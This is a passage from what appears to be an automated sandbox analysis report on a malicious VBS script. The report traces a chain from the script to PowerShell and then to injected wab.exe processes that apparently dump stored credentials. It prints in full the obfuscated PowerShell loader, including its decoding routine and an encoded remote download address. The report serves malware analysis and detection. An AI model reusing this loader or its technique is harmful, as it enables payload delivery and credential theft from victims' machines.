                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 16_2_00402F60
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: String function: 004169A7 appears 87 times
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: String function: 0044DB70 appears 41 times
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: String function: 004165FF appears 35 times
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: String function: 00422297 appears 42 times
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: String function: 00444B5A appears 37 times
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: String function: 00413025 appears 79 times
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: String function: 00416760 appears 69 times
                Source: SOA.vbs | Initial sample: Strings found which are bigger than 50
                Source: amsi32_5512.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 3516, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 5512, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: classification engine | Classification label: mal100.phis.troj.spyw.expl.evad.winVBS@19/14@1/3
                Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 14_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z,14_2_004182CE
                Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 16_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,FindCloseChangeNotification,16_2_00410DE1
                Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 14_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,??3@YAXPAX@Z,14_2_00418758
                Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 14_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,??3@YAXPAX@Z,Process32NextW,CloseHandle,14_2_00413D4C
                Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 14_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,14_2_0040B58D
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Dobbeltrudens140.Aff
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
                Source: C:\Program Files (x86)\Windows Mail\wab.exe	Mutant created: \Sessions\1\BaseNamedObjects\Rmc-SACUXX
                Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6112:120:WilError_03
                Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3784:120:WilError_03
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ja312hy.thz.ps1
                Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOA.vbs"
                Source: C:\Program Files (x86)\Windows Mail\wab.exe	System information queried: HandleInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=3516
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5512
                Source: C:\Windows\System32\wscript.exe	File read: C:\Users\user\Desktop\desktop.ini
                Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: wab.exe, wab.exe, 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                Source: wab.exe, wab.exe, 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                Source: wab.exe, 0000000A.00000002.3385163166.00000000217B0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                Source: wab.exe, wab.exe, 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                Source: wab.exe, wab.exe, 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                Source: wab.exe, wab.exe, 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                Source: wab.exe, 0000000E.00000003.2602870867.00000000052F5000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000E.00000002.2605548747.00000000052F4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: wab.exe, wab.exe, 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                Source: C:\Program Files (x86)\Windows Mail\wab.exe	Evasive API call chain: __getmainargs,DecisionNodes,exit graph_15-33261
                Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOA.vbs"
                Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens';If (${host}.CurrentCulture) {$Fightet++;}Function fyrstendmme($aldersforskellens){$Breddesekunder=$aldersforskellens.Length-$Fightet;$Energi='SUBsTRI';$Energi+='ng';For( $standsforskellenes=7;$standsforskellenes -lt $Breddesekunder;$standsforskellenes+=8){$Unblessed+=$aldersforskellens.$Energi.Invoke( $standsforskellenes, $Fightet);}$Unblessed;}function Illish($Phagedaena){ . ($Triangularize) ($Phagedaena);}$Opholdsstuernes=fyrstendmme 'Ove,logMP sternoStudentzB,throdiBasommal,ovangslCopywria rbefol/Aphidic5Blokskr.Overvaa0Duarchy Genrefo(Reser,eWDistrusiOsm.regnSpacersdcert,fioPassiarwInterjesPeckedi NydeligNMontr cTAnticle Medinde1 Overcr0elastom.Un.erfo0Renounc; Topot. Bia ricWTrimniniJetsrunnLsdelfl6Hovmodi4forrykk;Nautica stra hsxSne ker6Cohea.t4 theop.; Prster SelvcerEntase v Undres:undecor1Fejlber2Phyllos1Martial.Konkurr0Fdevand)Yawlers AbioloGFemkroneVejrm.lckommandkBemyndio Ti skr/Vaaben.2 Relati0 Fanwr 1Flugtni0Gerning0Analyse1Udmanvr0Sidetal1Lin.les Appo,ehFCyk lbaiSamekhurcalioloeMoa lesfRester o,estselxUdsp ng/ Aandev1 asiali2Tubercl1,eperso. 
drydde0 Fogf,u ';$Sorteringens=fyrstendmme 'PaakrveU Antedas Sjaelaevulkankr baga e-tjenestA.nderprgMemoryleTelak cn ndtjentDesinfi ';$Bespake=fyrstendmme 'Arthrozh Lat,setLaveslat GenbrupUdnvnel:Donnish/Telefon/Gambesm1Esquire0Aktiesm3Nonrepa. Pushie2Spag um3 Entome7Simonio. digame8 cul ee6 Mistan. Ba oni2Sawneba4porella7Rodesbl/ ClenchF BoatsirOpprioreGraagaamAndenklmBetonk,eSexol glBoghvediAf.rftegAdipsybs calceit GeodifeUlcerog.ElectroxApp,ehesAf,rydsnholden ';$Deutoxide=fyrstendmme 'Valgets>Bakteri ';$Triangularize=fyrstendmme 'UdfyldniMikalaseUforkorxReprodu ';$Doozie='Medansvaret';$Bombestoppets = fyrstendmme ' ,ulbrieUl,triccUngr.sphForretnoAfrett. Pa.gene%Becifreainex,repRuelsenpCostaladCarabaoaalk,nettPja,tesaFleshbr%tidtag.\ NonmitDSystemko Lnra,mbEkstraibScraggleBudgettlparadeftCraniomrSrsynetuThiokoldClericieSecondin Do torsHamalds1Avgusta4Hildebo0A bejds.hugtandASkoleinfUnreal.fSerpent trillin&Hilsene&B ngtow P.cocureInterfrctubi,olhArtiumsoc onebr .ustulatunmetap ';Illish (fyrstendmme ' Pixm.p$GastroegTypot kl etreado Trachob Pse.doa hrynidl La.dsd:ForsnknDMimicaleAndalusb mirska,osmolat HalefieStandtirDidrach= Nati.n(Genaabnc Derre.mSteer
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Dobbeltrudens140.Aff && echo t"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens';If (${host}.CurrentCulture) {$Fightet++;}Function fyrstendmme($aldersforskellens){$Breddesekunder=$aldersforskellens.Length-$Fightet;$Energi='SUBsTRI';$Energi+='ng';For( $standsforskellenes=7;$standsforskellenes -lt $Breddesekunder;$standsforskellenes+=8){$Unblessed+=$aldersforskellens.$Energi.Invoke( $standsforskellenes, $Fightet);}$Unblessed;}function Illish($Phagedaena){ . ($Triangularize) ($Phagedaena);}$Opholdsstuernes=fyrstendmme 'Ove,logMP sternoStudentzB,throdiBasommal,ovangslCopywria rbefol/Aphidic5Blokskr.Overvaa0Duarchy Genrefo(Reser,eWDistrusiOsm.regnSpacersdcert,fioPassiarwInterjesPeckedi NydeligNMontr cTAnticle Medinde1 Overcr0elastom.Un.erfo0Renounc; Topot. Bia ricWTrimniniJetsrunnLsdelfl6Hovmodi4forrykk;Nautica stra hsxSne ker6Cohea.t4 theop.; Prster SelvcerEntase v Undres:undecor1Fejlber2Phyllos1Martial.Konkurr0Fdevand)Yawlers AbioloGFemkroneVejrm.lckommandkBemyndio Ti skr/Vaaben.2 Relati0 Fanwr 1Flugtni0Gerning0Analyse1Udmanvr0Sidetal1Lin.les Appo,ehFCyk lbaiSamekhurcalioloeMoa lesfRester o,estselxUdsp ng/ Aandev1 asiali2Tubercl1,eperso. 
drydde0 Fogf,u ';$Sorteringens=fyrstendmme 'PaakrveU Antedas Sjaelaevulkankr baga e-tjenestA.nderprgMemoryleTelak cn ndtjentDesinfi ';$Bespake=fyrstendmme 'Arthrozh Lat,setLaveslat GenbrupUdnvnel:Donnish/Telefon/Gambesm1Esquire0Aktiesm3Nonrepa. Pushie2Spag um3 Entome7Simonio. digame8 cul ee6 Mistan. Ba oni2Sawneba4porella7Rodesbl/ ClenchF BoatsirOpprioreGraagaamAndenklmBetonk,eSexol glBoghvediAf.rftegAdipsybs calceit GeodifeUlcerog.ElectroxApp,ehesAf,rydsnholden ';$Deutoxide=fyrstendmme 'Valgets>Bakteri ';$Triangularize=fyrstendmme 'UdfyldniMikalaseUforkorxReprodu ';$Doozie='Medansvaret';$Bombestoppets = fyrstendmme ' ,ulbrieUl,triccUngr.sphForretnoAfrett. Pa.gene%Becifreainex,repRuelsenpCostaladCarabaoaalk,nettPja,tesaFleshbr%tidtag.\ NonmitDSystemko Lnra,mbEkstraibScraggleBudgettlparadeftCraniomrSrsynetuThiokoldClericieSecondin Do torsHamalds1Avgusta4Hildebo0A bejds.hugtandASkoleinfUnreal.fSerpent trillin&Hilsene&B ngtow P.cocureInterfrctubi,olhArtiumsoc onebr .ustulatunmetap ';Illish (fyrstendmme ' Pixm.p$GastroegTypot kl etreado Trachob Pse.doa hrynidl La.dsd:ForsnknDMimicaleAndalusb mirska,osmolat HalefieStandtirDidrach= Nati.n(Genaabnc Derre.mSteer
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Dobbeltrudens140.Aff && echo t"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
                Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\xmgittpzhob"
                Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\iglbtlabvwtooe"
                Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\kiztuekujelbqlwip"
                Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
                Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll
                Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
                Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll
                Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll
                Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll
                Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll
                Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll
                Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll
                Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll
                Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll
                Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll
                Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll
                Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll
                Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll
                Source: C:\Windows\System32\wscript.exe	Section loaded: gpapi.dll
                Source: C:\Windows\System32\wscript.exe	Section loaded: cryptnet.dll
                Source: C:\Windows\System32\wscript.exe	Section loaded: iphlpapi.dll
                Source: C:\Windows\System32\wscript.exe	Section loaded: winnsi.dll
                Source: C:\Windows\System32\wscript.exe	Section loaded: winhttp.dll
                Source: C:\Windows\System32\wscript.exe	Section loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\System32\wscript.exe	Section loaded: mswsock.dll
                Source: C:\Windows\System32\wscript.exe	Section loaded: dhcpcsvc6.dll
                Source: C:\Windows\System32\wscript.exe	Section loaded: dhcpcsvc.dll
                Source: C:\Windows\System32\wscript.exe	Section loaded: webio.dll
                Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll
                Source: C:\Windows\System32\wscript.exe	Section loaded: dnsapi.dll
                Source: C:\Windows\System32\wscript.exe	Section loaded: rasadhlp.dll
                Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll
                Source: C:\Windows\System32\wscript.exe	Section loaded: cabinet.dll
                Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll
                Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll
                Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll
                Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll
                Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll
                Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll
                Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll
                Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll
                Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll
                Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll
                Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll
                Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll
                Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll
                Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll
                Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll
                Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll
                Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
